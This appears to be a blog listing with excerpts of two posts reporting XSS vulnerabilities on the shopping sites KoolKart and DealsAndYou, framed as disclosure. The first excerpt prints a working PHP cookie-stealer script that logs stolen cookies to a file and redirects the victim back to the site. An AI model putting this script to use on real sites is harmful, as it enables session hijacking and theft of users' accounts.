KoolKart.com, get Kooler by sanitizing your input

Comments

Earlier, I demonstrated the XSS vulnerability in DealsAndYou (fixed) and now, I’ll demo a XSS bug on KoolKart.com. I’ll describe the whole process below.

Step 1 – Writing a php script for saving cookie returned by injected code (cookie-stealer.php).

$str = trim($_REQUEST['cookie']);
$file = 'cookie.txt';
if(!empty($str)){
    $current = file_get_contents($file);
    $current .= date('Y-m-d H:i:s') . "\t\t" . $str . "\n\n\n";
    file_put_contents($file, $current);
    header('Location: http://www.koolkart.com/');
}

The code is self explanatory. It gets the cookie information via querystring, saves it to a text file and redirects back to koolkart. Continue reading

DealsAndYou, why you no sanitize inputs?

Comments
Dealsandyou.com, Y U NO sanitize input

Dealsandyou.com, Y U NO sanitize input

Update: Dealsandyou has fixed the bug. Responded on twitter with a thanks.

Click to see full-size image.

dealsandyouthanks

I was looking at dealsandyou.com a couple of days back and something (may be their bad design) made me do a XSS vulnerability test on their “Search” input box using the XSS Locator code snippet. Voila!, an alert box popped up confirming my hunch. Continue reading